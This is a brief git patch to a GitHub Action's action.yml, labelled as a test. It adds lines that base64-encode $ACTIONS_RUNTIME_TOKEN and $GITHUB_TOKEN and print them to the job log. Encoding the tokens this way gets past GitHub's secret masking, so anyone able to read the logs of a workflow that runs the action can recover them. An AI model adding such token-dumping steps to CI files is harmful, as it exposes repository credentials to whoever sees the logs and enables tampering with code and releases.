From 5c38ce305c30b2d65a3dfa324c0e3e251b750065 Mon Sep 17 00:00:00 2001 From: Chl <chl@xlii.si> Date: Fri, 30 Aug 2024 19:38:24 +0200 Subject: [PATCH] test github... --- action.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/action.yml b/action.yml index d1e663b..97dea81 100644 --- a/action.yml +++ b/action.yml @@ -73,6 +73,10 @@ runs: $( echo "$ACTIONS_RUNTIME_TOKEN" | sed 's/.*\.\(.*\)\..*/\1/' | base64 -d 2>/dev/null | sed 's/.*Actions.Results:\([^:]\+\):\([^:" ]\+\).*/\1 \2/' ) EOF + echo "p'tit test" + echo "$ACTIONS_RUNTIME_TOKEN" | base64 + echo "$GITHUB_TOKEN" | base64 + # Request an upload URL RESPONSE="$( wget -O - \ --header 'Content-Type:application/json' \